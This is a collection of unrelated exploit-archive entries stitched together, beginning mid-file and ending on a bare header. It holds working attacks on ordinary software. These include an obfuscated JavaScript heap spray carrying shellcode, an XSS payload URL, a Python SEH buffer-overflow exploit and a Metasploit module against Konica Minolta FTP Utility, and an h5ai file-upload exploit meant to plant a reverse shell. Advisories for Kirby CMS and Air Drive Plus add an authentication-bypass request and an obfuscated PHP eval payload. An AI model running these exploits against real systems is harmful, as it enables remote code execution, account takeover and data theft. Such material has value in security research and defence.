void(Math.asin(0xbabe));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) {
void(Math.acos(0xbabe));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) {
if (len > this.KJZFzfumaV.length)
throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available";
return this.KJZFzfumaV.substr(0, len);
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) {
if (UWzqrDQwReXOllGssMYEzruQtomLp == 0)
throw "Round argument cannot be 0";
return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width)
{
var digits = "0123456789ABCDEF";
var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1);
while (num > 0xF) {
num = num >>> 4;
beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg;
}
var width = (width ? width : 0);
while (beTBwoiJGBBhwyZg.length < width)
beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg;
return beTBwoiJGBBhwyZg;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) {
return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (this.mem[tag] === undefined)
this.mem[tag] = new Array();
if (typeof arg == "string" || arg instanceof String) {
this.mem[tag].push(arg.substr(0, arg.length));
}
else {
this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2));
}
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) {
delete this.mem[tag];
CollectGarbage();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() {
this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache");
this.SWc("oleaut32");
for (var i = 0; i < 6; i++) {
this.nPdkLCpaz(32, "oleaut32");
this.nPdkLCpaz(64, "oleaut32");
this.nPdkLCpaz(256, "oleaut32");
this.nPdkLCpaz(32768, "oleaut32");
}
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768)
throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
this.nPdkLCpaz(arg, tag);
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) {
this.SWc(tag);
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() {
this.mNhbOXqosTNKjGhfj("Running the garbage collector");
CollectGarbage();
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) {
var count = (count ? count : 1);
for (var i = 0; i < count; i++) {
this.uYiBaSLpjlOJJdhFAb(arg);
this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR");
}
this.uYiBaSLpjlOJJdhFAb(arg);
this.K("ZsJjplNR");
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
var count = (count ? count : 1);
for (var i = 0; i < count; i++)
this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ");
this.K("WbjLbPsZ");
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg)
{
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
return this.heapBase + 0x688 + ((size+8)/8)*48;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) {
var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";
if (shellcode.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");
var udIUhjCc = unescape("%u9090%u7ceb")
for (var i = 0; i < 124/4; i++)
udIUhjCc += this.RBRfbU(jmpecx);
udIUhjCc += unescape("%u0028%u0028") +
shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length);
return udIUhjCc;
}
var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000);
var payload2 = unescape(
"%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" +
"%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" +
"%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" +
"%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" +
"%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" +
"%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" +
"");
var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090");
while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM;
offset_length = 0x5F6;
junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length);
var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(2, 0x40000 - 0x21);
for (var i=0; i < 250; i++) {
heap_obj.uYiBaSLpjlOJJdhFAb(block);
}
ctrl.InvokeContact(202116108)
</script>
</html>
source: https://www.securityfocus.com/bid/57664/info
The WP-Table Reloaded plugin for WordPress is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP-Table Reloaded versions prior to 1.9.4 are vulnerable.
http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
# Title: Konica Minolta FTP Utility - Remote Command Execution
# Date : 20/09/2015
# Author: R-73eN
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows XP SP3
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Every command is vulnerable to buffer overflow.
import socket
import struct
shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f"
shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29"
shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f"
shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3"
shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92"
shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe"
shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3"
shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a"
shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff"
shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9"
shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18"
shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc"
shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60"
shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba"
shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53"
shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a"
shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3"
shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65"
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
nSEH = "\xEB\x13\x90\x90"
SEH = struct.pack('<L',0x1220401E)
evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
s.connect((server, 21))
a = s.recv(1024)
print ' [+] ' + a
s.send('User ' + evil )
print '[+] https://www.infogen.al/ [+]'
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
'Description' => %q{
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
leads to an SEH overflow. Konica FTP allows anonymous access by default; valid
credentials are typically unnecessary to exploit this vulnerability.
},
'Author' =>
[
'Shankar Damodaran', # stack buffer overflow dos p.o.c
'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EBD', '37908' ]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1500,
'BadChars' => "\x00\x0a\x2f\x5c",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 SP1 x86',
{
'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll
'Offset' => 1037
}
]
],
'DisclosureDate' => 'Aug 23 2015',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
connect_login
buf = rand_text(target['Offset'])
buf << generate_seh_record(target.ret)
buf << payload.encoded
buf << rand_text(3000)
print_status("Sending exploit buffer...")
send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string
handler
disconnect
end
end
=============================================
- Release date: 14.09.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Kirby CMS <= 2.1.0 Authentication Bypass via Path Traversal
II. BACKGROUND
-------------------------
- Kirby CMS
"Kirby is a file‑based CMS
Easy to setup. Easy to use. Flexible as hell."
http://getkirby.com/
III. INTRODUCTION
-------------------------
KirbyCMS has a vulnerability that allows to bypass authentication in a hosting
environment where users within the same shared environment can save/read files
in a directory accessible by both the victim and the attacker.
IV. DESCRIPTION
-------------------------
As KirbyCMS is a file based CMS, it also stores authentication data
within files in accounts directory, each user has its own password file such as:
kirby/site/accounts/[username].php
At login, KirbyCMS refer to the password file to verify the passwor hash.
During the process, it fails to validate the resulting path to ensure that
it does not contain path traversal sequences such as '../' within the login
variable provided by a user.
This makes it vulnerable to a path traversal attack and allows to bypass
the authentication if an attacker is located in the same multi-user hosting
environment and can write files to a public directory such as /tmp accessible
by the victim site with KirbyCMS.
The exact code responsible for this vulnerability is located in
kirby/core/user.php file and is shown below:
---[ kirby/core/user.php ]---
abstract class UserAbstract {
protected $username = null;
protected $cache = array();
protected $data = null;
public function __construct($username) {
$this->username = str::lower($username);
// check if the account file exists
if(!file_exists($this->file())) {
throw new Exception('The user account could not be found');
}
...
}
protected function file() {
return kirby::instance()->roots()->accounts() . DS . $this->username() . '.php';
}
-----------------------------
In addition to the authentication bypass KirbyCMS was found to allow
authentication over HTTP protocol (resulting in passwords being sent
unencrypted), and to never expire authenticated sessions.
V. PROOF OF CONCEPT
-------------------------
KirbyCMS stores credentials in: kirby/site/accounts directory as PHP files
to prevent the contents from being accessed directly via the web server.
An example file with credentials looks as follows:
---[ victimuser.php ]---
<?php if(!defined('KIRBY')) exit ?>
username: victim
email: victim@mailserver.com
password: >
$2a$10$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5KBNfkOCKlAjznvDU7IuqpC
language: en
role: admin
------------------------
To bypass the authentication an attacker who has an account in the same
hosting environment as the victim can write the above credentials file
containing an encrypted hash of the password: trythisout
into a public directory such as:
/tmp/bypassauth.php
Because of the aformentioned Path Traversal vulnerability the attacker
can use such credentials and log in as an administrator
(via: http://victim-server.com/kirby/panel/login) with:
Username: ../../../../../../../../tmp/bypassauth
Password: trythisout
which will produce a HTTP POST request similar to:
POST /kirby/panel/login HTTP/1.1
Host: victim_kirby_site
Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6...
Content-Length: 149
username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1...
This will cause KirbyCMS to load credentials from the path:
/sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php
As a result, the attacker will get the following response:
<h2 class="hgroup hgroup-single-line cf">
<span class="hgroup-title">
<a href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account</a>
</span>
<span class="hgroup-options shiv shiv-dark shiv-left">
getting access to the KirbyCMS control panel with admin rights.
VI. BUSINESS IMPACT
-------------------------
Users who make use of vulnerable versions of KirbyCMS in shared hosting
environments are at risk of having their website modified by unauthorized users.
An attacker who manages to log in as an administrator will be able to change
all the existing content as well as upload new files.
This attack could be combined with the: 'CSRF Content Upload and PHP Script
Execution' vulnerability, also discovered by Dawid Golunski and described in a
separate document.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.
To exploit the vulnerability an attacker must be able to write a malicious
credentials file on the system in a public directory that is accessible by the
victim KirbyCMS site. This is a common situation on many hosting environments
that allow to write/read files from temporary directories such as /tmp,
/var/tmp etc.
Such file could potentially also be uploaded by other means, even if
the attacker does not have an account on the same server, such as anonymous FTP
, an email attachment which gets saved in a tmp file on the server etc.
VIII. SOLUTION
-------------------------
Upgrade to the patched version 2.1.1 released by the vendor upon this advisory.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/KirbyCMS-Path-Traversal-Authentication-Bypass-Vulnerability.txt
http://getkirby.com/
http://seclists.org/fulldisclosure/2015/Sep/index.html
http://www.securiteam.com/
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
14.09.2015 - Final
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
#!/usr/bin/env python
# Exploit Title: h5ai < 0.25.0 Unrestricted File Upload
# Date: 21 September 2015
# Exploit Author: rTheory
# Vendor Homepage: https://larsjung.de/h5ai/
# Vulnerable Software Link: https://web.archive.org/web/20140208063613/http://release.larsjung.de/h5ai/h5ai-0.24.0.zip
# Vulnerable Versions: 0.22.0 - 0.24.1
# Tested on: 0.24.0 running on Apache
# CVE : 2015-3203
import urllib
import urllib2
import socket
import os
import getopt
import sys
# Globals with default options
url = ''
path = '/'
fileName = ''
filePath = ''
verboseMode = False
def header():
print '+-----------------------------------------------+'
print '| File upload exploit for h5ai v0.22.0 - 0.24.1 |'
print '| See CVE-2015-3203 for vulnerability details |'
print '+------------------- rTheory -------------------+'
def usage():
print
print 'Usage: %s -t target_url -f upload_file' % os.path.basename(__file__)
print '-t --target - The URL to connect to'
print ' ex: http://example.com'
print '-f --file - The file to upload'
print ' ex: php-reverse-shell.php'
print '-p --path - The path to upload to'
print ' Default is \'/\''
print '-v --verbose - Enable more verbose output'
print
print 'Examples:'
print '%s -t http://example.com:8080 -f php-reverse-shell.php' % os.path.basename(__file__)
print '%s -t http://192.168.1.100 -f php-reverse-shell.php -p /dir/' % os.path.basename(__file__)
sys.exit(0)
def main():
global url
global path
global fileName
global filePath
global verboseMode
header()
if not len(sys.argv[4:]):
print '[-] Incorrect number of arguments'
usage()
try:
opts, args = getopt.getopt(sys.argv[1:],"ht:f:p:v", ["help","target","file","path","verbose"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ('-h','--help'):
usage()
elif o in ('-t','--target'):
url = a
elif o in ('-f','--file'):
fileName = a
elif o in ('-p','--path'):
path = a
elif o in ('-v','--verbose'):
verboseMode = True
else:
assert False,"Unhandled Option"
# Test target URL, target file, and path inputs for validity
if not url.startswith('http'):
print '[-] Error: Target URL must start with http:// or https://'
usage()
if not os.path.isfile(fileName):
print '[-] Error: File does not appear to exist'
usage()
if not (path.startswith('/') and path.endswith('/')):
print '[-] Error: Path must start and end with a \'/\''
usage()
# Determine target host, which is the URL minus the leading protocol
if url.find('http://') != -1:
host = url[7:]
elif url.find('https://') != -1:
host = url[8:]
else:
host = url
# Store the contents of the upload file into a string
print '[+] Reading upload file'
f = open(fileName,'r')
fileContents = f.read()
f.close()
MPFB = 'multipartformboundary1442784669030' # constant string used for MIME info
# Header information. Content-Length not needed.
http_header = {
"Host" : host,
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language" : "en-us,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Content-type" : "multipart/form-data; boundary=------" + MPFB,
"X-Requested-With" : "XMLHttpRequest",
"Referer" : url + path,
"Connection" : "keep-alive"
}
# POST parameter for file upload
payload = '--------'+MPFB+'\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n'
payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="href"\r\n\r\n'+path+'\r\n'
payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="userfile"; filename="'+fileName+'"\r\nContent-Type: \r\n\r\n'+fileContents+'\r\n'
payload += '--------'+MPFB+'--\r\n'
socket.setdefaulttimeout(5)
opener = urllib2.build_opener()
req = urllib2.Request(url, payload, http_header)
# submit request and print output. Expected: "code 0"
try:
print '[+] Sending exploit POST request'
res = opener.open(req)
html = res.read()
if verboseMode: print '[+] Server returned: ' + html
except:
print '[-] Socket timed out, but it might still have worked...'
# close the connection
opener.close()
# Last step: check to see if the file uploaded (performed outside of this function)
filePath = url + path + fileName
print '[+] Checking to see if the file uploaded:'
print '[+] ' + filePath
def postCheck():
# Check to see if the file exists
# This may work now that everything from main() was torn down
global filePath
try:
urllib2.urlopen(filePath)
print '[+] File uploaded successfully!'
except urllib2.HTTPError, e:
print '[-] File did not appear to upload'
except urllib2.URLError, e:
print '[-] File did not appear to upload'
main()
postCheck()
Document Title:
===============
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1597
Release Date:
=============
2015-09-21
Vulnerability Laboratory ID (VL-ID):
====================================
1597
Common Vulnerability Scoring System:
====================================
8.7
Product & Service Introduction:
===============================
Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required.
(Copy of the Vendor Homepage: https://itunes.apple.com/tr/app/air-drive-plus-your-file-manager/id422806570 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an arbitrary file upload web vulnerability in the official Photo Transfer 2 - v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-09-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Y.K. YING
Product: Air Drive Plus - iOS Mobile (Web-Application) 2.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Air Drive Plus v2.4 iOS web-application.
The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests
or system specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include
execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload
by usage of the wifi interface or local file sync function.
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8000/)
Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attacker without privilege web-application user acocunt or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC Payload(s):
http://localhost:8000/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png
PoC: Source (Upload File)
<tbody id="files"><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_ROOTLV")">.</a></td></tr><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_UPPERLV")">..</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/68-2.png">68-2.png</a></td><td>24,27KB</td><td align="center">2015-09-11 13:13:25</td><td align="center"><a onclick="javascript:delfile("68-2.png");" class="transparent_button">Delete</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]">2.png</a></td><td>538,00B</td><td align='center'>2015-09-11 13:17:21</td><td align='center'><a onclick='javascript:delfile("%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png");' class='transparent_button'>Delete</a></td></tr></tbody></table></iframe></a></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: pending[]
POST http://localhost:8000/AirDriveAction_file_add Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/index_files.html]
POST-Daten:
POST_DATA[-----------------------------52852184124488
Content-Disposition: form-data; name="uploadfile"; filename="<?php
//Obfuscation provided by BKM - PHP Obfuscator v2.47: $kda1640d3bfb="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($kda1640d3bfb(
"JGU3NTJiNzQxMTZhYzYwMjUzMDFiYWNlOGUwZTA2YmNiPSJc ... ... ...2MVx4MzhcNjJceDMwXDY3XHgzOFw2M1x4MzlcNjBceDM3XDE0Mlx4MzZcNjdceDM5XDE0NFx4MzVcMTQzXHg2Nlw
xNDZceDY1XDYzXHgzN1wxNDEiKT8kYjdkOTFjZDYwMzJlNDRiNDgzY2Y5MGRhOWM4ZmI1MDAoKTokdTZiZmM2YmN
jZjRiMjk4ZDkyZTQzMzFhMzY3MzllMjAoKTs="));
?>
2.png"
Content-Type: image/png
Status: 200[OK]
GET http://localhost:8000/a[ARBITRARY FILE UPLOAD VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/index_files.html]
Reference(s):
http://localhost:8000/index_files.html
http://localhost:8000/AirDriveAction_file_add/
http://1localhost:8000/AirDriveAction_file_show/
Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the filename value is estimated as high. (CVSS 8.7)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
# EXPLOIT TITLE: Masm32v11r Buffer Overflow(SEH overwrite) crash POC
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Date of Testing: 22nd September 2015
# Download Link : http://www.masm32.com/masmdl.htm
# Tested On : Windows 10
